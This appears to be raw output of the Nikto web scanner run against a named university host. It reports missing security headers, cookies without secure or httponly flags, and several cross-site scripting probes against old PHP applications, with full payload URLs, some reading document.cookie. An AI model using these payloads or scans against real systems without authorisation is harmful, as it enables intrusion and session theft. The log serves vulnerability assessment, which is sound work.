- Nikto v2.1.5/2.1.5
+ Target Host: ewp.tiss.tuwien.ac.at
+ Target Port: 443
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ GET /: Uncommon header 'digest' found, with contents: SHA-256=BjF7rUBJo+0WzLAaNd42jrhAJu8sJcvn8sWyV/aRQgQ=
+ GET /: Uncommon header 'want-digest' found, with contents: SHA-256
+ GET /: Cookie 8ac6864f375e42971d26ddf17c3231ba created without the secure flag
+ GET /: Cookie 8ac6864f375e42971d26ddf17c3231ba created without the httponly flag
+ GET /: Server is using a wildcard certificate: '*.tiss.tuwien.ac.at'
+ -27071: GET /phpimageview.php?pic=javascript:alert(8754): /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
